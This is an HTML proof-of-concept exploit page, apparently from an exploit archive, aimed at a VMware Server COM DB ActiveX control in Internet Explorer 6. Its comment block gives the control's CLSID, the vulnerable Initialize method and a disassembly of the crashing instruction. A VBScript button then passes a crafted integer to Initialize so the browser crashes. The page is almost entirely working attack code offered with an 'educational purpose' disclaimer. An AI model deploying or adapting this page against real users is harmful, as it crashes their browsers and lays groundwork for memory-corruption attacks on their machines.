<html> <!-- << Bug discovered by cN4phux >> a small GHH from DZ. # VMware COM DB ActiveX Remote Buffer Overflow Exploit # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # Tested on Windows XP Professional SP2, with Internet Explorer 6.x.x CLSID = '8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA' progID = "VMDBCOMLib.VMList" member_name = "Initialize" Target_File = "C:\Program Files\VMware\VMware Server\vmdbCOM.dll" # # Function that is vulnerable with a DOS IE . . Initialize() # Block Disassembly: 111AE667 RETN 111AE668 MOV EAX,[EBP+C] 111AE66B PUSH EBX 111AE66C PUSH EDI 111AE66D PUSH EAX 111AE66E MOV [ESI+4],EAX 111AE671 CALL [EAX] <-------------------- it will be crash here . . .< 111AE673 MOV EBX,[EBP+8] 111AE676 PUSH 1133D9D0 111AE67B PUSH EBX 111AE67C CALL 111AF800 111AE681 MOV EDI,EAX 111AE683 ADD ESP,C 111AE686 TEST EDI,EDI 111AE688 JL 111AE731
Exception Code: ACCESS_VIOLATION Disasm: 111AE671 CALL [EAX] (vmapplib.DLL)
# Greetz to friend's : Blub, Zigma, Heurs, djug & etc . . . -->
<object classid='clsid:8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA' id='VMware_function'></object> <input language=VBScript onclick=Buffer_Act() type=button value='Click here to start the crash DOS'> <script language='vbscript'> Sub Buffer_Act buff_1 = -2147483647 buff_2 = 1 buff_3 = unescape("%90") VMware_function.Initialize buff_1, buff_2 End Sub </script> </html>
|